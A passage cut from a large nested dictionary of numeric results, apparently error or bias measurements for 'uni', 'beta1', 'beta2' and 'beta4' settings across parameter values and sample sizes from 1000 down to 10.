'beta4': [0.17731566928548778, 3.7266964934594444]}, 30: {'uni': 1.882452851274314, 'beta1': 4.000525177515207, 'beta2': 2.51364631796368, 'beta4': [0.16839687927231317, 4.84316434096235]}, 20: {'uni': 2.445988350447573, 'beta1': 4.060592986449134, 'beta2': 3.2062441274392905, 'beta4': [0.21147740634989898, 3.5687642304126617]}, 10: {'uni': 2.2223725240828744, 'beta1': 4.131116767696193, 'beta2': 4.0318674319204195, 'beta4': [0.1798078313871271, 3.0758409111074045]}}}, 0.1: {1000: {1000: {'uni': 0.012708832597304081, 'beta1': 0.00033166037268448316, 'beta2': 0.21460865011093463, 'beta4': [0.0018516899147039188, 1.059075949409259]}, 750: {'uni': 0.015060860054651262, 'beta1': 0.0006641253071293576, 'beta2': 0.2162166847452195, 'beta4': [0.0025527950881468827, 1.0547627588805712]}, 500: {'uni': 0.023939712971963126, 'beta1': 0.0007901604824047292, 'beta2': 0.24516800594107138, 'beta4': [0.004049694984104264, 1.0444988223242697]}, 400: {'uni': 0.027519572187397166, 'beta1': 0.002460002937910002, 'beta2': 0.261583470206204, 'beta4': [0.004661086832628227, 1.0431727643760105]}, 300: {'uni': 0.03627168676673069, 'beta1': 0.003146307185794746, 'beta2': 0.28682321208602907, 'beta4': [0.005410896474224397, 1.0373268243809708]}, 200: {'uni': 0.06606377693153227, 'beta1': 0.007127748304258846, 'beta2': 0.33526098694387013, 'beta4': [0.007843924312649053, 1.031481235215888]}, 150: {'uni': 0.09086736508905224, 'beta1': 0.011997147118561492, 'beta2': 0.39574485872929643, 'beta4': [0.012200131983621673, 1.0273614609515949]}, 100: {'uni': 0.11749233892140523, 'beta1': 0.0254874114936232, 'beta2': 0.40218091488595314, 'beta4': [0.016694345643181282, 1.0227124741537679]}, 75: {'uni': 0.13891536843765345, 'beta1': 0.0422040997632223, 'beta2': 0.4486272343137246, 'beta4': [0.02832653618019821, 1.0204206100863231]}, 50: {'uni': 0.2262449259542918, 'beta1': 0.08429066248193409, 'beta2': 0.5361554713125934, 'beta4': [0.03447726288853555, 1.0163471180661057]}, 30: {'uni': 0.3046689747877375, 'beta1': 0.143070283433812, 'beta2': 0.5687306521971477, 'beta4': [0.05140180541873996, 1.0146360366065286]}, 20: {'uni': 0.4296501536662478, 'beta1': 0.23259937226933894, 'beta2': 0.6661995228128583, 'beta4': [0.06742218487190954, 1.0114185216903036]}, 10: {'uni': 0.6748084625054919, 'beta1': 0.49249563656701206, 'beta2': 0.8271069531483622, 'beta4': [0.1102081844535559, 1.0086284465073807]}}, 750: {1000: {'uni': 0.016825551470189676, 'beta1': 0.0006897508449283568, 'beta2': 0.2633817678529082, 'beta4': [0.002694730956010692, 1.0791736796957117]}, 750: {'uni': 0.014048162967651316, 'beta1': 0.0007569685985984386, 'beta2': 0.23812376536046528, 'beta4': [0.0028744534835104148, 1.0751155224246156]}, 500: {'uni': 0.02812865188139113, 'beta1': 0.0009302726102285589, 'beta2': 0.28246276144047333, 'beta4': [0.003735251551528202, 1.0597034812793988]}, 400: {'uni': 0.028719991483692222, 'beta1': 0.0017210638478949442, 'beta2': 0.2521281788410891, 'beta4': [0.0057939649484265, 1.0568273537337944]}, 300: {'uni': 0.037442167799592474, 'beta1': 0.0029211389748540683, 'beta2': 0.28567597638856496, 'beta4': [0.007203252380980234, 1.0466619958682954]}, 200: {'uni': 0.06386556896150186, 'beta1': 0.007692212159565061, 'beta2': 0.3106853134678437, 'beta4': [0.008767209623206432, 1.0446977774575243]}, 150: {'uni': 0.07299108201427365, 'beta1': 0.009718847056601669, 'beta2': 0.35201252209709477, 'beta4': [0.01224241715996128, 1.037131011344825]}, 100: {'uni': 0.10404627177637138, 'beta1': 0.022002753992872198, 'beta2': 0.4027319974479996, 'beta4': [0.022041507551256105, 1.0283267345056883]}, 75: {'uni': 0.14415530253194253, 'beta1': 0.037313404141351224, 'beta2': 0.4487551520582601, 'beta4': [0.02308272957055226, 1.024847369129623]}, 50: {'uni': 0.18248580783173268, 'beta1': 0.06745752768881445, 'beta2': 0.5947234162875032, 'beta4': [0.03627165827218634, 1.023766184264096]}, 30: {'uni': 0.32010167971071957, 'beta1': 0.15819047328158758, 'beta2': 0.5964957292802823, 'beta4': [0.05138985807089626, 1.0189550791244228]}, 20: {'uni': 0.39132132239254896, 'beta1': 0.22935783878929317, 'beta2': 0.6897849051318254, 'beta4': [0.0708944891337828, 1.016073773033508]}, 10: {'uni': 0.633040103484694, 'beta1': 0.47854921461048383, 'beta2': 0.8056053943120505, 'beta4': [0.10927439293108314, 1.0129604700427997]}}, 500: {1000: {'uni': 0.02104866521905844, 'beta1': 0.0011076284762351462, 'beta2': 0.2455918455759565, 'beta4': [0.004128660183094929, 1.1046783319382874]}, 750: {'uni': 0.021757644812859883, 'beta1': 0.0013214567659403334, 'beta2': 0.2521007069597216, 'beta4': [0.003648828733603831, 1.098452444443017]}, 500: {'uni': 0.025306401204840658, 'beta1': 0.0012633210587387736, 'beta2': 0.2634180726409405, 'beta4': [0.004378750756189057, 1.0828752514482893]}, 400: {'uni': 0.03287825204093101, 'beta1': 0.0014649065692894452, 'beta2': 0.29674790610489143, 'beta4': [0.005038844169335943, 1.0820989472446443]}, 300: {'uni': 0.03919582437697649, 'beta1': 0.0032964478006695897, 'beta2': 0.28786217514683415, 'beta4': [0.005155953968189604, 1.0727548580615853]}, 200: {'uni': 0.05265772859784692, 'beta1': 0.007179735146244032, 'beta2': 0.32819508372958256, 'beta4': [0.010450188839043964, 1.0555283397540252]}, 150: {'uni': 0.07426215980201245, 'beta1': 0.01071226895358679, 'beta2': 0.346592044637774, 'beta4': [0.011794864375166105, 1.0557565101703543]}, 100: {'uni': 0.09473751106227296, 'beta1': 0.020243396397742374, 'beta2': 0.40449469255381554, 'beta4': [0.016063490757556757, 1.043220122669047]}, 75: {'uni': 0.1526544667465516, 'beta1': 0.05565631922498948, 'beta2': 0.4948063047875674, 'beta4': [0.028189581940918265, 1.0438445988295184]}, 50: {'uni': 0.19264485864816036, 'beta1': 0.05989197049685187, 'beta2': 0.511997231910665, 'beta4': [0.036553687466457846, 1.0339604748795699]}, 30: {'uni': 0.28834715829751595, 'beta1': 0.1510890312715177, 'beta2': 0.589643860381959, 'beta4': [0.05150135594467901, 1.0281633332742106]}, 20: {'uni': 0.4234892194088218, 'beta1': 0.24125642146873605, 'beta2': 0.6532763993515733, 'beta4': [0.0787906083401277, 1.0224514492768015]}, 10: {'uni': 0.6373839649057689, 'beta1': 0.4687121970847603, 'beta2': 0.8065683045396626, 'beta4': [0.10620791541316066, 1.0176075022605533]}}, 400: {1000: {'uni': 0.029961593391199526, 'beta1': 0.0013213432517489214, 'beta2': 0.316112362691536, 'beta4': [0.0062188760201176375, 1.1284533576800397]}, 750: {'uni': 0.039777492934285896, 'beta1': 0.001508579177318669, 'beta2': 0.26143774121719054, 'beta4': [0.004763534234071238, 1.129866844282858]}, 500: {'uni': 0.027808281938736364, 'beta1': 0.002235578290604194, 'beta2': 0.2766486730364398, 'beta4': [0.005669313513005218, 1.1070477515133545]}, 400: {'uni': 0.03448721993106457, 'beta1': 0.002060896148615263, 'beta2': 0.2778739245365818, 'beta4': [0.005947201799245449, 1.1007850822479124]}, 300: {'uni': 0.038881825703913186, 'beta1': 0.0022205198114061166, 'beta2': 0.3449535264664368, 'beta4': [0.006411456500606179, 1.0867240695066167]}, 200: {'uni': 0.050601381926499364, 'beta1': 0.007855702997021598, 'beta2': 0.3119624149190063, 'beta4': [0.009781905195309765, 1.0781068487788759]}, 150: {'uni': 0.08081326564454214, 'beta1': 0.017136945406907373, 'beta2': 0.33243652782842975, 'beta4': [0.015865869842987972, 1.0692547767185392]}, 100: {'uni': 0.10273800778525288, 'beta1': 0.01999439686782297, 'beta2': 0.36994464265717686, 'beta4': [0.01653887961667779, 1.0555295877630724]}, 75: {'uni': 0.1259534595047032, 'beta1': 0.034388184145579245, 'beta2': 0.41308332325358277, 'beta4': [0.020239833747756678, 1.049561450582556]}, 50: {'uni': 0.1849579302990263, 'beta1': 0.07194816166882964, 'beta2': 0.5263002506691301, 'beta4': [0.030427049802672235, 1.0383309410150727]}, 30: {'uni': 0.29600170578233825, 'beta1': 0.12149484405151426, 'beta2': 0.5963678413155551, 'beta4': [0.055869335451423426, 1.0350485321179137]}, 20: {'uni': 0.4076696162001894, 'beta1': 0.27875125626527186, 'beta2': 0.6589684457465328, 'beta4': [0.07279883473388286, 1.0287125415345189]}, 10: {'uni': 0.6334440096496123, 'beta1': 0.4774986007980533, 'beta2': 0.8060685291046624, 'beta4': [0.10574684271567839, 1.0218591798545416]}}, 300: {1000: {'uni': 0.040572771380711144, 'beta1': 0.0028585526771383826, 'beta2': 0.3400160777578032, 'beta4': [0.007736399745246395, 1.1863024489259968]}, 750: {'uni': 0.04299416638630284, 'beta1': 0.002969868017451892, 'beta2': 0.2909040336627516, 'beta4': [0.007000230903639683, 1.1459452626888829]}, 500: {'uni': 0.05125391371795476, 'beta1': 0.002165638761144419, 'beta2': 0.30806868145586364, 'beta4': [0.005871679176627796, 1.1511125842098944]}, 400: {'uni': 0.04503334265214086, 'beta1': 0.0023602480297385017, 'beta2': 0.3301573120464285, 'beta4': [0.005448144002562095, 1.145418767540703]}, 300: {'uni': 0.044520962521187445, 'beta1': 0.003065998702340159, 'beta2': 0.3114521080701248, 'beta4': [0.006251618359843171, 1.118905728758287]}, 200: {'uni': 0.05777226508003848, 'beta1': 0.006768243637099554, 'beta2': 0.3236793485763856, 'beta4': [0.008218350087491232, 1.0969879140078251]}, 150: {'uni': 0.08387495266946396, 'beta1': 0.010696581160994418, 'beta2': 0.3565871015349815, 'beta4': [0.01144643737733734, 1.0873803983499324]}, 100: {'uni': 0.10709220720060389, 'beta1': 0.03215236993520353, 'beta2': 0.39545976429996976, 'beta4': [0.01766019366672807, 1.0818261167328507]}, 75: {'uni': 0.1401149186955662, 'beta1': 0.04354744217174392, 'beta2': 0.4521360551441519, 'beta4': [0.024005024384320558, 1.0673838858138462]}, 50: {'uni': 0.19916349358035706, 'beta1': 0.05995508419162838, 'beta2': 0.4958590133326075, 'beta4': [0.032857961472088894, 1.0667769493972883]}, 30: {'uni': 0.30982126533332466, 'beta1': 0.1341973395058801, 'beta2': 0.5631122123039468, 'beta4': [0.052474472496597306, 1.0445759847739207]}, 20: {'uni': 0.44932270699336363, 'beta1': 0.2356147017439962, 'beta2': 0.6447178052807758, 'beta4': [0.07448923790120071, 1.0377852803437868]}, 10: {'uni': 0.6199778343521001, 'beta1': 0.4979560542799865, 'beta2': 0.8017114529605197, 'beta4': [0.1056367550997906, 1.033874766370601]}}, 200: {1000: {'uni': 0.06242982893046301, 'beta1': 0.006311543311467927, 'beta2': 0.3546209775823574, 'beta4': [0.011478130136808503, 1.2109739309006156]}, 750: {'uni': 0.052645349892701816, 'beta1': 0.00713333042905062, 'beta2': 0.35074257146111876, 'beta4': [0.0105252868048244, 1.2171709487406868]}, 500: {'uni': 0.0585692402437379, 'beta1': 0.005896496236549341, 'beta2': 0.3170457782036068, 'beta4': [0.010683921303693576, 1.1842346463599915]}, 400: {'uni': 0.06290504904317053, 'beta1': 0.006712146741219611, 'beta2': 0.3613015164572914, 'beta4': [0.010733396037533883, 1.1849658508273218]}, 300: {'uni': 0.06631100580163242, 'beta1': 0.005249788236707511, 'beta2': 0.3412605845181866, 'beta4': [0.011532162132481623, 1.1808880298303235]}, 200: {'uni': 0.05872088995242879, 'beta1': 0.010287989073223893, 'beta2': 0.44114280047537957, 'beta4': [0.00940073797560703, 1.1526662372069578]}, 150: {'uni': 0.08680495004311953, 'beta1': 0.010432318675711202, 'beta2': 0.369518802507579, 'beta4': [0.011286805439364736, 1.120530358597126]}, 100: {'uni': 0.10514360043392249, 'beta1': 0.022843793816391938, 'beta2': 0.3990470778297997, 'beta4': [0.015352115793283905, 1.1111111828101878]}, 75: {'uni': 0.1548412719042399, 'beta1': 0.03497861146212196, 'beta2': 0.445642088740141, 'beta4': [0.024145019301651638, 1.1051082659349265]}, 50: {'uni': 0.19564761821360332, 'beta1': 0.06808577885293414, 'beta2': 0.4993873294578854, 'beta4': [0.027713298941496742, 1.0881906064783706]}, 30: {'uni': 0.3052472539595662, 'beta1': 0.12861243803016686, 'beta2': 0.5839087481358557, 'beta4': [0.05379333122729778, 1.0638546764114587]}, 20: {'uni': 0.42157212241427794, 'beta1': 0.2969555420165084, 'beta2': 0.6281606948650471, 'beta4': [0.06813417382770101, 1.0565341199655685]}, 10: {'uni': 0.6484698436861565, 'beta1': 0.5003510754676674, 'beta2': 0.7699596346968957, 'beta4': [0.11317240911394794, 1.0456765098967737]}}, 150: {1000: {'uni': 0.08366248595753015, 'beta1': 0.010446216149631336, 'beta2': 0.3932715459128066, 'beta4': [0.011561818709477627, 1.305602936248631]}, 750: {'uni': 0.07118697101283993, 'beta1': 0.01599980521069211, 'beta2': 0.4054713674024028, 'beta4': [0.015584562017383204, 1.2956283529452284]}, 500: {'uni': 0.08579946452689481, 'beta1': 0.011882995152922274, 'beta2': 0.41246933746770353, 'beta4': [0.01230725834002692, 1.2908217120418506]}, 400: {'uni': 0.10206478064567753, 'beta1': 0.010533507293093415, 'beta2': 0.37815775687446657, 'beta4': [0.013644516225509768, 1.2377646001800173]}, 300: {'uni': 0.06696098811374691, 'beta1': 0.015707664590499864, 'beta2': 0.36108061087642107, 'beta4': [0.011243078434367986, 1.2209644625062315]}, 200: {'uni': 0.07582632025632613, 'beta1': 0.018921317191341738, 'beta2': 0.47381975709885216, 'beta4': [0.009876617862388208, 1.1808296909941922]}, 150: {'uni': 0.07630227709705345, 'beta1': 0.011433401525463767, 'beta2': 0.35839012304833423, 'beta4': [0.012818986604319665, 1.1802180500312938]}, 100: {'uni': 0.10786524730960866, 'beta1': 0.023480822442160966, 'beta2': 0.3971224363546612, 'beta4': [0.01709550425962655, 1.151116255963359]}, 75: {'uni': 0.13969696753181376, 'beta1': 0.03894177698361236, 'beta2': 0.46715246191361925, 'beta4': [0.024033296209019752, 1.1264838497994534]}, 50: {'uni': 0.22699845146544836, 'beta1': 0.06872062711213502, 'beta2': 0.5219019735135487, 'beta4': [0.031972705924561626, 1.127262590512302]}, 30: {'uni': 0.3054153298488651, 'beta1': 0.16648267461758534, 'beta2': 0.5606383325792897, 'beta4': [0.05706286020859661, 1.084204159768233]}, 20: {'uni': 0.4190052140990755, 'beta1': 0.23938694526158966, 'beta2': 0.6567567086969817, 'beta4': [0.06063104673629702, 1.0765768348326303]}, 10: {'uni': 0.6476542690569347, 'beta1': 0.5041556276697949, 'beta2': 0.7851190350954672, 'beta4': [0.10573852458138985, 1.0651944694890478]}}, 100: {1000: {'uni': 0.1036434876877887, 'beta1': 0.022364853152579772, 'beta2': 0.5292843993585943, 'beta4': [0.02314691582316915, 1.4467707103679326]}, 750: {'uni': 0.10335029362377335, 'beta1': 0.030060385136366257, 'beta2': 0.4208440719945956, 'beta4': [0.019280741475252636, 1.4088886174584125]}, 500: {'uni': 0.10376192559298011, 'beta1': 0.023777122143537794, 'beta2': 0.5616028046723718, 'beta4': [0.024082841464177725, 1.4090081022445462]}, 400: {'uni': 0.13631741533589026, 'beta1': 0.02388755267987828, 'beta2': 0.49195520157294537, 'beta4': [0.020305042646486506, 1.3649746644812781]}, 300: {'uni': 0.13432139541589827, 'beta1': 0.023480683123979638, 'beta2': 0.4061390685762313, 'beta4': [0.02388635447192918, 1.3133212077424719]}, 200: {'uni': 0.12739786607587839, 'beta1': 0.020107519579753312, 'beta2': 0.45952481877063966, 'beta4': [0.021929161477884124, 1.2871761359143647]}, 150: {'uni': 0.10898370722109206, 'beta1': 0.0294913822797383, 'beta2': 0.5126319119168943, 'beta4': [0.017117421378655046, 1.2559742846324167]}, 100: {'uni': 0.12173415399962331, 'beta1': 0.029129867966793198, 'beta2': 0.5070227168049106, 'beta4': [0.01683981545477253, 1.246721863000209]}, 75: {'uni': 0.13498049555541441, 'beta1': 0.040464719589934244, 'beta2': 0.493025079772468, 'beta4': [0.02304366181944447, 1.1964882870163205]}, 50: {'uni': 0.19534608713221155, 'beta1': 0.0741369784036267, 'beta2': 0.5183169385473728, 'beta4': [0.034831165872610405, 1.1949239176282795]}, 30: {'uni': 0.30805816742549175, 'beta1': 0.1664021904025582, 'beta2': 0.5594858087243508, 'beta4': [0.05065502968190902, 1.1277215135863552]}, 20: {'uni': 0.4129540972085036, 'beta1': 0.22505442505495474, 'beta2': 0.6586789797514485, 'beta4': [0.06766096112265912, 1.1402723916542454]}, 10: {'uni': 0.6573864598611118, 'beta1': 0.4684846064556031, 'beta2': 0.794366053169467, 'beta4': [0.11468185689905351, 1.0863010136620521]}}, 75: {1000: {'uni': 0.18058180891528738, 'beta1': 0.037801701091263615, 'beta2': 0.5375554079408202, 'beta4': [0.022627377065022616, 1.6468214031174047]}, 750: {'uni': 0.17043142639842407, 'beta1': 0.042323861627189194, 'beta2': 0.5726471250293982, 'beta4': [0.027701870488874847, 1.4761000056892333]}, 500: {'uni': 0.1623261189491226, 'beta1': 0.04190800730982917, 'beta2': 0.5307750705381211, 'beta4': [0.02461383433205972, 1.4697198929879072]}, 400: {'uni': 0.16145797819679752, 'beta1': 0.03647548901238954, 'beta2': 0.5315701591627016, 'beta4': [0.02647811576481531, 1.4535080057475438]}, 300: {'uni': 0.15530089279897658, 'beta1': 0.03237409300356481, 'beta2': 0.5516168967599163, 'beta4': [0.021442907821948645, 1.4123882699990165]}, 200: {'uni': 0.17697523696823808, 'beta1': 0.04474700247588399, 'beta2': 0.5972192196010739, 'beta4': [0.02425642206461014, 1.3622012159367398]}, 150: {'uni': 0.18022118040525992, 'beta1': 0.04973126406029865, 'beta2': 0.5575656144691391, 'beta4': [0.041701851682596956, 1.3762461426964758]}, 100: {'uni': 0.16433779080943353, 'beta1': 0.05197785747946283, 'beta2': 0.7125558130922166, 'beta4': [0.021594167934128383, 1.277995498756572]}, 75: {'uni': 0.15574035820942522, 'beta1': 0.03753623782874999, 'beta2': 0.6594361088676222, 'beta4': [0.03041572556389392, 1.3035561091028944]}, 50: {'uni': 0.18528367625092257, 'beta1': 0.058418019883555695, 'beta2': 0.5859983026896285, 'beta4': [0.03287075645889381, 1.197963424643406]}, 30: {'uni': 0.33717193717239086, 'beta1': 0.15972206611315357, 'beta2': 0.6312902712515196, 'beta4': [0.053274124739167164, 1.1818333324712798]}, 20: {'uni': 0.3778933771594146, 'beta1': 0.24660391594637412, 'beta2': 0.6258005697368938, 'beta4': [0.06425956306492152, 1.1835172283435373]}, 10: {'uni': 0.6436618954411614, 'beta1': 0.46316810126751673, 'beta2': 0.7811380357663973, 'beta4': [0.10631223882126731, 1.1150057118472687]}}, 50: {1000: {'uni': 0.25808978521407333, 'beta1': 0.15286500185699975, 'beta2': 0.5826925265510525, 'beta4': [0.034467286889795036, 1.5864361747408757]}, 750: {'uni': 0.2456412375307066, 'beta1': 0.09688410933656752, 'beta2': 0.6623046558218882, 'beta4': [0.0386809666782265, 1.7464944613556568]}, 500: {'uni': 0.2690821708539631, 'beta1': 0.10807263816836116, 'beta2': 0.6208916018976451, 'beta4': [0.04208865557048511, 1.8588053084450398]}, 400: {'uni': 0.30779724152757976, 'beta1': 0.07008374742747679, 'beta2': 0.6563945987856405, 'beta4': [0.037440644670713945, 1.567814559277183]}, 300: {'uni': 0.24357058167621404, 'beta1': 0.07610853729969821, 'beta2': 0.6351194247134633, 'beta4': [0.04234563975675384, 1.6172451253474347]}, 200: {'uni': 0.2363976999457054, 'beta1': 0.08107649857407076, 'beta2': 0.6736222653167869, 'beta4': [0.036278935272213875, 1.5304741409120481]}, 150: {'uni': 0.2610121772600879, 'beta1': 0.0970721039952632, 'beta2': 0.6373563878119448, 'beta4': [0.039267605566479145, 1.6152863379484848]}, 100: {'uni': 0.25887956260664496, 'beta1': 0.0749904503307929, 'beta2': 0.6053419211526976, 'beta4': [0.04457433007738977, 1.4866090790047208]}, 75: {'uni': 0.26824734647328496, 'beta1': 0.12671407341083857, 'beta2': 0.7088195394325436, 'beta4': [0.036659734617877866, 1.4757908941788034]}, 50: {'uni': 0.2157848876945146, 'beta1': 0.179047877195215, 'beta2': 0.6430388460295624, 'beta4': [0.0391000990025914, 1.3557498703015833]}, 30: {'uni': 0.3192054118087819, 'beta1': 0.1401721849908211, 'beta2': 0.8343938671057323, 'beta4': [0.04470518427368649, 1.2932248331626337]}, 20: {'uni': 0.44510976621687803, 'beta1': 0.21980400379396323, 'beta2': 0.700861422059113, 'beta4': [0.0769617944142653, 1.2345363706331847]}, 10: {'uni': 0.6347832511266515, 'beta1': 0.46188004670925575, 'beta2': 0.7495583632205935, 'beta4': [0.1305758638756061, 1.2022133212025055]}}, 30: {1000: {'uni': 0.42892879393806227, 'beta1': 0.2900339381216153, 'beta2': 0.9179423439811932, 'beta4': [0.06714029920409238, 2.1317261773472023]}, 750: {'uni': 0.4319538785876898, 'beta1': 0.27188371653759374, 'beta2': 0.9805852295742616, 'beta4': [0.070835223582246, 1.9229053732675119]}, 500: {'uni': 0.5337901444492364, 'beta1': 0.2829226601033528, 'beta2': 0.9905448799057903, 'beta4': [0.07612682556429423, 2.076515079639593]}, 400: {'uni': 0.39881851895745213, 'beta1': 0.26899106022077685, 'beta2': 0.9024444948214578, 'beta4': [0.05401799877222632, 1.8734518365407848]}, 300: {'uni': 0.6739736484193996, 'beta1': 0.2727368263724961, 'beta2': 0.9523117920073443, 'beta4': [0.05673109471662844, 2.063349821863002]}, 200: {'uni': 0.5330467944857724, 'beta1': 0.23457124841939445, 'beta2': 0.9209146724782004, 'beta4': [0.05392848614071637, 2.1843840064284774]}, 150: {'uni': 0.42169483702592286, 'beta1': 0.23102624314533526, 'beta2': 1.0957735143101772, 'beta4': [0.059481382178213825, 2.1216513918653437]}, 100: {'uni': 0.6626893623786265, 'beta1': 0.26768286418498294, 'beta2': 0.9158900858984962, 'beta4': [0.06812396698026751, 1.699363398801483]}, 75: {'uni': 0.40272005064764316, 'beta1': 0.30576524079527273, 'beta2': 0.8537642594078427, 'beta4': [0.05500177232308054, 1.759340527948887]}, 50: {'uni': 0.4454592863478265, 'beta1': 0.22504133999635, 'beta2': 0.895156147172035, 'beta4': [0.06047032418708357, 1.6131334609036276]}, 30: {'uni': 0.4770799136690089, 'beta1': 0.28771044466108114, 'beta2': 0.9915883541772491, 'beta4': [0.05533692052705431, 1.5508614397335567]}, 20: {'uni': 0.47782291469689375, 'beta1': 0.2938634148011197, 'beta2': 1.0424979003898318, 'beta4': [0.0647423513839497, 1.4508953034317449]}, 10: {'uni': 0.7269557754136924, 'beta1': 0.543897763233955, 'beta2': 1.4307116481814752, 'beta4': [0.10876709935086068, 1.325984870412566]}}, 20: {1000: {'uni': 0.7184217429237197, 'beta1': 0.4206672630068364, 'beta2': 1.1613123688886902, 'beta4': [0.0965283978439124, 2.269289374072948]}, 750: {'uni': 0.8534940710908991, 'beta1': 0.5750736583955173, 'beta2': 1.5370822261631976, 'beta4': [0.11705211724316403, 2.3985476027245425]}, 500: {'uni': 0.7100015488711899, 'beta1': 0.6055030167508085, 'beta2': 1.3366756110977158, 'beta4': [0.08901810252717048, 2.5039934903960024]}, 400: {'uni': 1.024882066657459, 'beta1': 0.6339328801184981, 'beta2': 1.3420862247975562, 'beta4': [0.11404947586800851, 2.286363998147505]}, 300: {'uni': 0.7865904251052587, 'beta1': 0.6071705295391215, 'beta2': 1.2856926816307097, 'beta4': [0.12113879919712968, 2.5946298846866784]}, 200: {'uni': 0.9392908385222309, 'beta1': 0.5745637648665203, 'beta2': 1.1427799247137727, 'beta4': [0.11765217795293076, 2.3656722555394056]}, 150: {'uni': 1.0463030353811855, 'beta1': 0.505199427703051, 'beta2': 1.136751565860195, 'beta4': [0.08916754586166624, 2.3244992955685637]}, 100: {'uni': 0.7096332746322297, 'beta1': 0.6584700089137518, 'beta2': 1.1955612879172697, 'beta4': [0.0793400828260651, 2.0810546674001063]}, 75: {'uni': 0.5686801021941732, 'beta1': 0.9064292489368356, 'beta2': 1.3967282306451674, 'beta4': [0.08123013465573295, 2.0910440423359367]}, 50: {'uni': 0.776933863952061, 'beta1': 0.6292461657268993, 'beta2': 1.554076323925928, 'beta4': [0.08839935153937976, 2.0327820301000203]}, 30: {'uni': 0.8454812842111926, 'beta1': 0.5691239590988605, 'beta2': 1.5452301545383769, 'beta4': [0.07962479640843732, 1.7801768614752502]}, 20: {'uni': 0.7155766744358403, 'beta1': 0.5367615346103896, 'beta2': 1.3929673945151635, 'beta4': [0.08547240159964724, 1.735089005961175]}, 10: {'uni': 0.814156374135484, 'beta1': 0.6943350919872927, 'beta2': 1.2256108824087348, 'beta4': [0.11175964139287464, 1.531470926335231]}}, 10: {1000: {'uni': 2.1502607486814758, 'beta1': 2.961193440812989, 'beta2': 3.6605411238614165, 'beta4': [0.1685138308258897, 4.444830757691141]}, 750: {'uni': 2.048526112731403, 'beta1': 4.151762896697908, 'beta2': 2.3424163082460217, 'beta4': [0.17031697375504729, 6.406286404246016]}, 500: {'uni': 2.495870260411924, 'beta1': 3.011726545286237, 'beta2': 3.2570697722296176, 'beta4': [0.1655469571590933, 5.777875203382532]}, 400: {'uni': 2.099881963929635, 'beta1': 2.329850145831139, 'beta2': 2.5795427219498634, 'beta4': [0.1891660716402167, 4.113063534228842]}, 300: {'uni': 2.789000548267903, 'beta1': 3.3427408254436237, 'beta2': 2.838444995116569, 'beta4': [0.18080810485975166, 5.743157914926659]}, 200: {'uni': 2.714319577071239, 'beta1': 2.674969297747632, 'beta2': 4.072106365271376, 'beta4': [0.1673096893670284, 4.156795438643065]}, 150: {'uni': 2.0149494775741075, 'beta1': 2.077635206644789, 'beta2': 3.078141288269228, 'beta4': [0.18767729882393866, 4.360721452118907]}, 100: {'uni': 1.9624533144767615, 'beta1': 3.019315635257828, 'beta2': 4.385469655540163, 'beta4': [0.1900315552805855, 3.3758081408933553]}, 75: {'uni': 2.6676512104969414, 'beta1': 5.305550512983561, 'beta2': 3.1206067511159787, 'beta4': [0.18286929913842218, 4.0556761458530515]}, 50: {'uni': 1.7764267325813035, 'beta1': 3.9516861090331017, 'beta2': 2.409413746837362, 'beta4': [0.17075107365496775, 3.4929925209103336]}, 30: {'uni': 1.979122970210084, 'beta1': 2.7491634214533307, 'beta2': 4.072617355039488, 'beta4': [0.2180077625841771, 3.2609298387610655]}, 20: {'uni': 1.8375355117463443, 'beta1': 2.3463533042171085, 'beta2': 2.503163105574244, 'beta4': [0.21114898088540743, 2.787162687085637]}, 10: {'uni': 2.427976117487353, 'beta1': 2.291521208099949, 'beta2': 2.944087053867329, 'beta4': [0.17835194176860436, 2.5696040508544296]}}}, 0.2: {1000: {1000: {'uni': 0.012280780292956572, 'beta1': 0.0002693384381689057, 'beta2': 0.2090690518552283, 'beta4': [0.0018020663792893063, 1.0502132198035559]}, 750: {'uni': 0.01651843115887509, 'beta1': 0.0005487421176163686, 'beta2': 0.20148442431487518, 'beta4': [0.0024425787732128127, 1.0477212885148937]}, 500: {'uni': 0.025353088253298767, 'beta1': 0.0010396605293617447, 'beta2': 0.23966111809097265, 'beta4': [0.0034985508949701427, 1.038970161345098]}, 400: {'uni': 0.030198518441976466, 'beta1': 0.0012021829507310755, 'beta2': 0.2594658028963883, 'beta4': [0.004490616440973693, 1.0371676882826277]}, 300: {'uni': 0.04730794946255178, 'beta1': 0.0031329041561488774, 'beta2': 0.28118782311034385, 'beta4': [0.006281029145284682, 1.0325050480220268]}, 200: {'uni': 0.05761447368464398, 'beta1': 0.00673361604946926, 'beta2': 0.2975256995575922, 'beta4': [0.009157081044446456, 1.0260278761104196]}, 150: {'uni': 0.07591819198214711, 'beta1': 0.013946942490422313, 'beta2': 0.34576552304435454, 'beta4': [0.011552729481228095, 1.0240945498285348]}, 100: {'uni': 0.1368580302706355, 'beta1': 0.02526249569893405, 'beta2': 0.38557800822543326, 'beta4': [0.019884020172808305, 1.0191300056011763]}, 75: {'uni': 0.1287872905890261, 'beta1': 0.030867395988007203, 'beta2': 0.4469931272901678, 'beta4': [0.02345546040016165, 1.0175172104748686]}, 50: {'uni': 0.1886157640394165, 'beta1': 0.06213874888664438, 'beta2': 0.4968675395552036, 'beta4': [0.031118814289369752, 1.015031367073955]}, 30: {'uni': 0.3360712300993455, 'beta1': 0.14289602608957086, 'beta2': 0.5929558125978679, 'beta4': [0.05283026319228742, 1.0118317036567743]}, 20: {'uni': 0.37439596985315937, 'beta1': 0.19104466956177601, 'beta2': 0.6679428647952825, 'beta4': [0.058414984981661984, 1.0110032494290406]}, 10: {'uni': 0.5889445132413289, 'beta1': 0.41592284653448874, 'beta2': 0.7578871781713459, 'beta4': [0.09012671207857803, 1.0074859980250308]}}, 750: {1000: {'uni': 0.0146304743338266, 'beta1': 0.0005353139672967838, 'beta2': 0.21543389133258695, 'beta4': [0.002897910486266618, 1.068844018212424]}, 750: {'uni': 0.016626630038685863, 'beta1': 0.000506508364560486, 'beta2': 0.2414624038752328, 'beta4': [0.00262856495812392, 1.0640476852072571]}, 500: {'uni': 0.022089331148686053, 'beta1': 0.0009422277350338522, 'beta2': 0.2479237578547018, 'beta4': [0.003432339519279511, 1.0569707861052167]}, 400: {'uni': 0.030814483057757476, 'beta1': 0.0022416542674890327, 'beta2': 0.24616751839453985, 'beta4': [0.004434707962325523, 1.0509906076614757]}, 300: {'uni': 0.03912077527542531, 'beta1': 0.002888923108919827, 'beta2': 0.2618563052834662, 'beta4': [0.005607512772963669, 1.0431435805548956]}, 200: {'uni': 0.0589807671507729, 'beta1': 0.0064499974624839486, 'beta2': 0.3105643336337045, 'beta4': [0.011864309357212723, 1.0353157317081894]}, 150: {'uni': 0.07154171520476793, 'beta1': 0.009202361892378634, 'beta2': 